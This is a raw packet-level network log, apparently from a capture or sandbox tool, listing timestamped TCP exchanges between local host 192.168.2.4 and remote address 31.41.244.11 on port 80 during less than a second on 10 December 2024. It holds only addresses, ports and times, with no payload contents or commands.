Dec 10, 2024 00:43:11.917469978 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.917512894 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.918494940 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.918545961 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.918613911 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.918657064 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.919605970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.919663906 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.919714928 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.919763088 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.920718908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.920777082 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.920824051 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.920877934 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.921801090 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.921854019 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.921906948 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.921957016 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.922909021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.922965050 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.923031092 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.923080921 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.923999071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.924050093 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.924104929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.924155951 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.925111055 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.925173044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.925250053 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.925298929 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.926235914 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.926286936 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.926393032 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.926440001 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.927418947 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.927473068 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.927505970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.927544117 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.928450108 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.928502083 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.928534031 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.928582907 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.929555893 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.929608107 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.929622889 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.929676056 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.930639982 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.930692911 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.930713892 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.930763960 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.931788921 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.931839943 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.931858063 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.931902885 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.932845116 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.932890892 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.933005095 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.933049917 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.933948994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.934005976 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.934057951 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.934099913 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.935094118 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.935143948 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.935244083 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.935287952 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.936213970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.936254978 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.936335087 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.936374903 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.937264919 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.937306881 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.937391043 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.937433958 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:11.938333988 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:11.938384056 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.144884109 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.144906998 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.144958019 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.144987106 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.145044088 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.145056009 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.145083904 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.145097971 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.265589952 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.265603065 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.265703917 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.265716076 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.265722036 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.265727043 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.265780926 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386167049 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386179924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386188984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386198997 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386209011 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386219978 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386230946 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386244059 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386296034 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386497021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386545897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386595011 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386606932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386645079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386646986 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386656046 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.386682987 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.386709929 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.387501001 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387512922 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387525082 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387540102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387551069 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.387551069 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387562037 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387572050 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387574911 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.387586117 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.387600899 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.387620926 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.387650013 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.388406992 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388417006 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388427973 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388437986 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388447046 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388457060 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388458014 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.388468027 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.388484955 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.388506889 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.389280081 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389297962 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389307976 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389318943 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389327049 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.389328957 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389338970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389348984 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389355898 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.389359951 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.389384985 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.389401913 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.390134096 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390145063 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390182018 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.390408039 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390418053 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390435934 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390445948 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390455008 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390458107 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.390467882 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390471935 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.390479088 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390490055 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.390496969 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.390528917 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.391360998 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391372919 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391382933 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391393900 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391402960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391407967 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.391415119 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391423941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391432047 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.391434908 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.391452074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.391474962 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.392187119 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392199993 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392210007 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392220974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392231941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392232895 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.392256021 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392256975 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.392266989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392277002 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.392282963 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.392314911 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.393176079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393188953 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393198013 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393208981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393219948 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393230915 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393233061 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.393240929 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393251896 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.393270016 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.393294096 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.393976927 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.393990040 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394000053 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394038916 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.394057989 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394068956 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394072056 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.394079924 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394090891 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394098043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.394102097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394124985 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.394159079 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.394972086 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394984007 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.394994974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395005941 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395015001 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395025969 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395036936 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395046949 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.395046949 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395066977 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.395081043 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.395778894 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395790100 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395798922 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.395833969 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.395850897 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.396228075 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396239042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396248102 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396259069 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396269083 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396276951 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.396280050 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396286011 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396295071 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.396306038 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.396331072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.397216082 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.397228956 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.397239923 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.397267103 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.397281885 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399024963 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399039030 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399079084 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399739981 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399753094 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399789095 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399795055 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399801970 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399823904 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399828911 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399837971 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399848938 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399857044 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399861097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.399882078 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.399908066 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.400748014 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400759935 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400774956 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400789022 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400789976 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.400800943 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400818110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.400819063 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400831938 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400844097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.400849104 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.400868893 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.400890112 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.401571035 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.401587009 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.401617050 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.401643991 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402031898 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402045012 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402056932 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402069092 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402079105 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402081966 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402095079 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402107000 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402107000 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402122974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402127981 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402156115 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402184010 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402898073 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402909994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402921915 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402932882 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402945042 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402949095 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402956963 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402966022 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.402967930 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.402995110 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.403017998 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.403793097 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403805971 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403817892 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403830051 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403841972 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403845072 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.403853893 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403865099 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403876066 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.403877020 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.403901100 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.403915882 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.404792070 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404803991 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404814959 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404827118 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404838085 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404839039 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.404850960 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404863119 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404869080 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.404875994 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.404882908 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.404900074 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.404928923 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.405601025 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405620098 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405632019 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405643940 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405653000 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.405656099 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405668974 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405673027 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.405680895 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405692101 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.405697107 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.405715942 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.405738115 CET	49790	80	192.168.2.4	31.41.244.11
Dec 10, 2024 00:43:12.406492949 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406506062 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406517029 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406528950 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406541109 CET	80	49790	31.41.244.11	192.168.2.4
Dec 10, 2024 00:43:12.406547070 CET	49790	80	192.168.2.4	31.41.244.11
